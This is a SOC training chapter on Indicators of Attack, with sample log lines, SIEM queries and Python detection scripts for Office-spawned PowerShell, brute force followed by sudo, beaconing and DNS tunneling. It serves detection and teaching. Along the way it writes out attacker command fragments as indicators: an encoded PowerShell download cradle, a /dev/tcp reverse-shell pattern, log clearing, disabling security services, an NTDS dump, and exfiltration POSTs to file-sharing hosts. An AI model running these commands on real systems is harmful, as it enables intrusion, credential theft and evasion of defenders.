Indicators of Attack (IOAs)

Indicators of Attack focus on attacker intent and behavior, not on static values like IPs or hashes.
IOAs detect what the attacker is doing, instead of what the attacker left behind.
This makes IOAs more durable than IOCs: an attacker can rotate domains, IPs, filenames and hashes in minutes, but changing how the intrusion is actually carried out (the techniques, the tooling, the order of actions) costs real effort and often breaks the tooling they rely on.

This chapter covers IOAs from the SOC seat: common attacker behavior patterns, the log evidence each one leaves, the SIEM logic that catches them, and the investigation workflow built on top of them.


What IOAs Actually Are

IOAs identify malicious actions, patterns, and techniques, such as:

  • Credential brute force

  • Privilege escalation

  • Lateral movement

  • Persistence creation

  • Process injection

  • Script execution

  • Data staging and exfiltration

  • Unauthorized application execution

IOAs answer the question:

“What malicious activity is happening right now?”

Unlike IOCs, IOAs do not depend on having seen the specific artifact before; they match the action regardless of which file, domain or address carried it out.


Why IOAs Are More Powerful Than IOCs

IOCs fail when:

  • Attackers move to new infrastructure

  • The malware is recompiled or repacked, so the hash changes

  • C2 domains rotate

  • The blocked IP list goes stale

IOAs detect:

  • Technique, not artifact

  • Intent, not signature

  • Behavior, not static data

This gives the SOC a realistic chance of detecting:

  • Zero-day attacks

  • Fileless malware

  • Polymorphic malware

  • New C2 infrastructure

  • Unknown threat actors


Core IOA Categories (Practical SOC Breakdown)

Below are the behaviors SOC analysts monitor in logs.


1. Initial Access IOAs

Phishing Execution Pattern

WINWORD.exe → powershell.exe → curl payload

Malicious Office Macro

office application spawning cmd/powershell

Drive-by Download

browser → dropped executable → network beaconing

2. Execution IOAs

Encoded PowerShell Execution

powershell.exe -nop -w hidden -enc JAB...

Script execution from suspicious directories

/tmp/x.sh
/var/tmp/backdoor.py
C:\Users\Public\script.vbs

Fileless attacks

IEX (New-Object Net.WebClient).DownloadString(...)

3. Persistence IOAs

New/Modified Startup Items

HKCU\...\Run\backdoor
/etc/crontab or /etc/cron.d entry added
systemd service created

Malicious Scheduled Tasks

schtasks /create /tn "Updater" /tr "malware.exe"

Cron Persistence

CRON: (root) CMD (/tmp/bd.sh)

4. Privilege Escalation IOAs

Sudo to an interactive shell

sudo: mayur : TTY=pts/0 ; PWD=/home/mayur ; USER=root ; COMMAND=/bin/bash

(Admins legitimately run sudo -i or sudo bash; the account, the source host and what happened just before are what make this an IOA.)

UID/GID Manipulation

setuid root on unknown binary

Kernel exploit attempt

segfault in privileged process

Admin Token Abuse

4672 - Special privileges assigned to new logon

(4672 fires for every administrative logon, so it only means something when the account, host or time of day is out of place.)

5. Defense Evasion IOAs

Clearing Logs

> /var/log/auth.log

Disabling Security Services

systemctl stop ufw
reg add ...\TamperProtection = 0

Obfuscation

powershell.exe with base64 or obfuscated variables

6. Credential Access IOAs

LSASS Access

unexpected process opening a handle to lsass.exe with read access (Sysmon Event ID 10)

Keylogging Patterns

global keyboard hooks installed (e.g. SetWindowsHookEx with WH_KEYBOARD_LL) or raw input devices registered by a non-UI process

Dumping SAM/NTDS

ntdsutil "ac i ntds" "ifm" ...

7. Discovery/Recon IOAs

Enumerating users/domains

Get-ADUser -Filter *

Network scanning

nmap 10.0.0.0/24

SMB enumeration

smbclient -L //<target>

8. Lateral Movement IOAs

SMB/PSExec Lateral Movement

4624 Logon Type 3 + admin + unusual host

WinRM Lateral Movement

powershell Invoke-Command -ComputerName server01

SSH Pivoting (Linux)

Accepted publickey for root from 10.0.0.25

9. Collection IOAs

Data Staging

zip -r data.zip /home/

Sensitive file access

/etc/shadow read attempt by a non-root process (auditd logs the denied open)

Database dumps

mysqldump -u root -p*

10. Exfiltration IOAs

Large outbound POST requests

POST https://file.io/upload SIZE_OUT=6MB

DNS tunneling

TXT queries with long encoded strings

Reverse shells

/dev/tcp/<attacker-ip>/4444

Real IOA Examples from Logs

Windows (Sysmon)

EventID=1 (ProcessCreate): WINWORD.exe → powershell.exe
EventID=3 (NetworkConnect): powershell.exe connection to 91.22.113.10
EventID=10 (ProcessAccess): powershell.exe opened lsass.exe with read access
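The three Sysmon lines above are one chain, and a SIEM should report them as one. The script below is an added example, not code from the original page: it correlates constructed Sysmon Event ID 1, 3 and 10 records (the process GUIDs, the 91.22.113.10 address and the download URL are invented) into a single finding list, decodes the -enc payload so the analyst sees what actually ran, and checks the GrantedAccess mask on the LSASS handle.

```python
"""Correlate Sysmon events into the WINWORD -> powershell -> C2 -> LSASS chain.

Added example, not code from the original page. The events below are
constructed and shaped like Sysmon Event ID 1 (ProcessCreate), 3
(NetworkConnect) and 10 (ProcessAccess) after SIEM field parsing; the
GUIDs, the destination IP and the payload URL are invented.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "rundll32.exe"}
# PROCESS_VM_READ (0x0010): every credential dumper needs it to read LSASS memory.
PROCESS_VM_READ = 0x0010


def _ps_encoded(script: str) -> str:
    """Encode a script the way `powershell -enc` expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry, in chronological order.
EVENTS = [
    {"EventID": 1, "ProcessGuid": "P-WORD", "ParentProcessGuid": "P-EXPLORER",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\mayur\Downloads\invoice.docm"'},
    {"EventID": 1, "ProcessGuid": "P-PS", "ParentProcessGuid": "P-WORD",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _ps_encoded(
         "IEX (New-Object Net.WebClient).DownloadString('http://91.22.113.10/a')")},
    {"EventID": 3, "ProcessGuid": "P-PS",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "91.22.113.10", "DestinationPort": 443},
    {"EventID": 10, "SourceProcessGUID": "P-PS",
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
]


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the script behind -e/-ec/-en/-enc/-EncodedCommand, or None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                  cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def correlate(events):
    """Walk the events once and return (rule, detail) findings.

    A process is 'tainted' once its creation matches an IOA; later network
    or LSASS events from it are reported as part of the same chain.
    In production, allowlist known AV/EDR and system images by full path
    before alerting on LSASS access.
    """
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    tainted, findings = set(), []
    for e in events:
        if e["EventID"] == 1:
            parent = procs.get(e["ParentProcessGuid"])
            child = _basename(e["Image"])
            if parent and _basename(parent["Image"]) in OFFICE_APPS and child in SHELLS:
                tainted.add(e["ProcessGuid"])
                findings.append(("office_spawns_shell",
                                 f"{_basename(parent['Image'])} -> {child}"))
            script = decode_encoded_command(e.get("CommandLine", ""))
            if script is not None:
                tainted.add(e["ProcessGuid"])
                findings.append(("encoded_powershell", script))
        elif e["EventID"] == 3 and e["ProcessGuid"] in tainted:
            findings.append(("c2_connection_from_tainted_process",
                             f"{e['DestinationIp']}:{e['DestinationPort']}"))
        elif e["EventID"] == 10 and _basename(e["TargetImage"]) == "lsass.exe":
            if int(e["GrantedAccess"], 16) & PROCESS_VM_READ:
                findings.append(("lsass_memory_read",
                                 f"{_basename(e['SourceImage'])} GrantedAccess={e['GrantedAccess']}"))
    return findings


if __name__ == "__main__":
    for rule, detail in correlate(EVENTS):
        print(f"[{rule}] {detail}")
```

The decode step is the triage shortcut: a `-enc` blob looks opaque in the alert, but base64 over UTF-16LE turns it back into the `IEX ... DownloadString(...)` one-liner in one call, which is usually enough to classify the event without touching the host.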

Linux

CRON: (root) CMD (/tmp/bd.py)
sshd: Accepted password for root from 185.*
python backdoor executing in /tmp

Network Logs

DNS NXDOMAIN storms
C2 domain beaconing at regular intervals
High-volume POST uploads

IOA vs IOC (Practical Example)

IOC Example:

Hash: F23A...03 (beacon.exe)

This becomes useless as soon as the attacker recompiles or repacks the binary, which changes the hash.

IOA Example:

powershell.exe -enc base64
network beacon every 60 seconds
logon type 10 from foreign IP

These patterns are costly to change: the attacker would have to give up encoded PowerShell, add heavy jitter to the beacon, or stop using remote logons, and each of those slows the operation or costs capability.


How SOC Detects IOAs in SIEM

Behavioral Rules

parent_process = WINWORD.exe AND process = powershell.exe

Multi-step correlation alerts

powershell.exe → outbound connection to a destination the host has never contacted before (rare ASN, newly registered domain, or a geography the business has no reason to talk to)

Frequency-based rules

DNS queries every 60 seconds

Sequence detections

failed logins >10 → successful login → sudo
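The sequence rule above (failed logins >10 → successful login → sudo) and the Linux log lines shown earlier (CRON job from /tmp, root password login) can be implemented as one pass over auth.log. The script below is an added example, not code from the original page: the log lines are constructed in the syslog layout written by OpenSSH, sudo and cron, and the host name, accounts, IPs and timestamps are invented. State is keyed per (user, source IP) so one noisy scanner cannot trip the rule for an unrelated account.

```python
"""Sequence detection over Linux auth logs: brute force -> login -> sudo shell.

Added example, not code from the original page. The log lines are
constructed in the syslog layout written by OpenSSH, sudo and cron
(/var/log/auth.log, /var/log/syslog); host, users, IPs and times are invented.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_THRESHOLD = 10                   # the page's "failed logins >10"
BRUTE_WINDOW = timedelta(minutes=10)    # failures older than this do not count
SUDO_WINDOW = timedelta(minutes=30)     # how long after the login a sudo shell is tied to it
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

SYSLOG = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
                    r"(?P<prog>[\w.-]+)(?:\[\d+\])?: (?P<msg>.*)$")
SSH_AUTH = re.compile(r"^(?P<result>Failed|Accepted) (?P<method>\w+) for "
                      r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
SUDO_CMD = re.compile(r"^\s*(?P<user>\S+) : .*COMMAND=(?P<cmd>\S+)")
CRON_CMD = re.compile(r"^\((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")

# Constructed sample: 12 failures, then success, sudo to bash, root login, cron from /tmp,
# followed by a benign admin session that must not be flagged.
LOG_LINES = [
    f"Mar  3 02:14:{s:02d} web01 sshd[{2200 + s}]: Failed password for mayur "
    f"from 185.220.101.7 port {40100 + s} ssh2"
    for s in range(12)
] + [
    "Mar  3 02:14:40 web01 sshd[2290]: Accepted password for mayur from 185.220.101.7 port 40190 ssh2",
    "Mar  3 02:15:02 web01 sudo:    mayur : TTY=pts/1 ; PWD=/home/mayur ; USER=root ; COMMAND=/bin/bash",
    "Mar  3 02:16:00 web01 sshd[2300]: Accepted password for root from 185.220.101.7 port 40200 ssh2",
    "Mar  3 02:17:01 web01 CRON[2310]: (root) CMD (/tmp/bd.sh)",
    "Mar  3 02:20:11 web01 sshd[2401]: Accepted publickey for ops from 10.0.0.5 port 51022 ssh2: ED25519 SHA256:QWJj",
    "Mar  3 02:20:30 web01 sudo:      ops : TTY=pts/2 ; PWD=/home/ops ; USER=root ; COMMAND=/usr/bin/apt update",
]


def parse(line):
    """Split a syslog line into (timestamp, host, program, message); None if it does not fit."""
    m = SYSLOG.match(line)
    if not m:
        return None
    # auth.log carries no year; pin one so the datetimes are comparable.
    ts = datetime.strptime(re.sub(r"\s+", " ", m["ts"]), "%b %d %H:%M:%S").replace(year=2024)
    return ts, m["host"], m["prog"], m["msg"]


def detect(lines):
    """Return (rule, detail) findings in the order the evidence appears."""
    failures = defaultdict(list)    # (user, ip) -> timestamps of failed logins
    compromised = {}                # user -> time of the brute-forced login
    findings = []
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, host, prog, msg = parsed
        if prog == "sshd" and (m := SSH_AUTH.match(msg)):
            key = (m["user"], m["ip"])
            if m["result"] == "Failed":
                failures[key].append(ts)
                continue
            recent = [t for t in failures.pop(key, []) if ts - t <= BRUTE_WINDOW]
            if m["user"] == "root" and m["method"] == "password":
                findings.append(("root_password_login", f"{host}: root from {m['ip']}"))
            if len(recent) > FAILED_THRESHOLD:
                compromised[m["user"]] = ts
                findings.append(("brute_force_then_success",
                                 f"{host}: {m['user']} from {m['ip']} after {len(recent)} failures"))
        elif prog == "sudo" and (m := SUDO_CMD.match(msg)):
            user, cmd = m["user"], m["cmd"]
            if cmd in SHELLS and user in compromised and ts - compromised[user] <= SUDO_WINDOW:
                findings.append(("sudo_shell_after_brute_force", f"{host}: {user} -> {cmd}"))
        elif prog == "CRON" and (m := CRON_CMD.match(msg)):
            if m["cmd"].startswith(SCRATCH_DIRS):
                findings.append(("cron_from_scratch_dir", f"{host}: ({m['user']}) {m['cmd']}"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(LOG_LINES):
        print(f"[{rule}] {detail}")
```

Note that the ops session produces nothing even though it also ends in sudo as root: with no preceding failures the sudo is not linked to a brute force, which is the whole point of a sequence rule over a flat `sudo AND COMMAND=...` match.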

SIEM Queries for IOA Detection

Detect PowerShell abuse

process_name:(powershell.exe OR pwsh.exe) AND (CommandLine:"-enc" OR CommandLine:"-EncodedCommand" OR CommandLine:"-nop" OR CommandLine:"-w hidden")

Keep the switch match tight: a bare *enc* wildcard also hits -Encoding and -ExecutionPolicy and floods the queue.

Detect privilege escalation

sudo AND COMMAND:(/bin/bash OR /bin/sh OR /bin/su)

On its own this is noisy; pair it with the account, the source host and the events that preceded the login.

Detect lateral movement

4624 AND logon_type:3 AND admin_account AND unusual_host

Detect exfiltration

method:POST AND bytes_out > 1000000

Tune the threshold to the host's baseline; a fixed byte count alone misses transfers split into small chunks.

Detect DNS tunneling

query_length > 100 AND query_type:TXT

TXT is the classic carrier but not the only one; tunnels also ride A, AAAA and CNAME queries.
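The frequency-based rules above (a beacon every 60 seconds, long encoded DNS queries) are the ones a flat query handles worst, because "regular" and "encoded" are statistical properties rather than string matches. The script below is an added example, not code from the original page: it runs a jitter-tolerant beacon test and a label-entropy DNS check over constructed connection and DNS records (the timestamps, hosts, IPs and domains are invented) and shows a human browsing pattern and a long but dictionary-like CDN name staying below both bars.

```python
"""Frequency-based IOAs: C2 beaconing and DNS tunneling over sample records.

Added example, not code from the original page. The connection and DNS
records below are constructed (timestamps, hosts, IPs and domains are
invented); the field names mirror parsed proxy and DNS logs in a SIEM.
"""
import math
from collections import defaultdict
from statistics import mean, pstdev

MIN_EVENTS = 8          # with fewer samples any interval can look "regular"
MAX_JITTER_CV = 0.25    # std/mean of inter-arrival gaps; implants usually sit well below this
MIN_LABEL_LEN = 30      # leftmost DNS label length that warrants an entropy check
MIN_ENTROPY = 4.0       # bits/char: dictionary-like names stay under, base32/64 chunks go over


def _records(src, dst, gaps, bytes_out):
    """Turn a list of inter-arrival gaps into connection records (constructed data)."""
    recs, t = [], 0.0
    for g in gaps:
        t += g
        recs.append({"ts": t, "src": src, "dst": dst, "bytes_out": bytes_out})
    return recs


# An implant sleeping 60 s with +/-10 % jitter versus a user's bursty browsing.
CONNECTIONS = (
    _records("10.0.0.25", "91.22.113.10", [54, 66, 58, 62, 60, 55, 65, 57, 63, 59] * 2, 412)
    + _records("10.0.0.31", "203.0.113.80", [1, 2, 300, 3, 45, 900, 2, 1, 120, 5] * 2, 1200)
)

QUERIES = [
    {"qname": "gm4kx7q2vz9dr1pw5tn8bh3fyc6ljs0ae4kxm7q2.t.tunnel.example", "qtype": "TXT"},
    {"qname": "p2q9vx7mzk4w1rt6ny8cb3hf5gl0dj2sa9ue7kxq.t.tunnel.example", "qtype": "A"},
    {"qname": "static-content-delivery-edge-node-production.cdn.example", "qtype": "A"},
    {"qname": "r3---sn-4g5e6nsz.video.example", "qtype": "A"},
]


def beacon_candidates(conns):
    """Per (src, dst) pair: mean interval and jitter; 'beacon' when the gaps are regular."""
    by_pair = defaultdict(list)
    for c in conns:
        by_pair[(c["src"], c["dst"])].append(c["ts"])
    out = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < MIN_EVENTS:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        cv = pstdev(gaps) / mean(gaps)
        out[pair] = {"n": len(stamps), "interval_s": round(mean(gaps), 1),
                     "cv": round(cv, 3), "beacon": cv < MAX_JITTER_CV}
    return out


def shannon_entropy(s):
    """Bits per character of the string's own symbol distribution."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())


def dns_tunnel_candidates(queries):
    """Flag queries whose leftmost label is long and high-entropy.

    Judging the label itself, rather than total length plus TXT, also catches
    tunnels carried in A/AAAA/CNAME queries and shorter chunks. Hex-encoded
    channels top out at 4.0 bits/char, so for those lower MIN_ENTROPY or add
    a count of distinct labels per parent domain.
    """
    flagged = []
    for q in queries:
        label = q["qname"].split(".")[0]
        if len(label) >= MIN_LABEL_LEN:
            ent = shannon_entropy(label)
            if ent >= MIN_ENTROPY:
                flagged.append((q["qname"], q["qtype"], round(ent, 2)))
    return flagged


if __name__ == "__main__":
    for pair, stats in beacon_candidates(CONNECTIONS).items():
        print(pair, stats)
    for hit in dns_tunnel_candidates(QUERIES):
        print("dns-tunnel?", hit)
```

The coefficient of variation is what makes the beacon test survive jitter: a 10 % sleep randomisation barely moves it, while human traffic, with gaps from one second to fifteen minutes, lands far above the cutoff. In production, run the same computation per (src, dst) pair over a rolling window and suppress known update and telemetry endpoints, which beacon too.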

Full Attack Timeline Using IOAs

The stages below mix Windows and Linux evidence on purpose, so each of the log sources shown earlier appears at least once.

1 — Initial Access

User opens malicious doc:

WINWORD.exe → powershell.exe

2 — Execution

powershell.exe -enc JAB...

3 — Persistence

HKCU\Run\backdoor

4 — Privilege Escalation

sudo: user : COMMAND=/bin/bash

5 — Lateral Movement

4624 Logon Type 3 from infected host

6 — Collection

zip -r /tmp/data.zip /home

7 — Exfiltration

POST https://transfer.sh/upload SIZE_OUT=4MB

IOAs give the SOC a detection opportunity at every stage of the kill chain, not just at the point where a known artifact appears.


Analyst Workflow Using IOAs

  1. Identify suspicious behavior (not just static values)

  2. Determine attack stage (initial access, lateral movement, etc.)

  3. Correlate logs across endpoints + network

  4. Map the behavior to the matching MITRE ATT&CK technique(s)

  5. Check for repetition or automation

  6. Search for related suspicious activity

  7. Build timeline

  8. Confirm malicious intent

  9. Escalate incident

  10. Create new detections based on observed IOAs

This workflow is how SOC analysts detect new, unknown, or zero-day threats.


Intel Dump

  • IOAs detect attacker behavior, not static values.

  • IOAs include execution patterns, privilege escalation, lateral movement, persistence, C2 behavior, and exfiltration.

  • IOAs are harder for attackers to evade than IOCs.

  • IOAs allow detection of fileless malware, zero-days, and polymorphic malware.

  • SIEM rules use process sequences, frequency patterns, parent-child chains, and network anomalies.

  • IOA-based detection outlines entire kill chains from execution → persistence → credential access → movement → exfiltration.
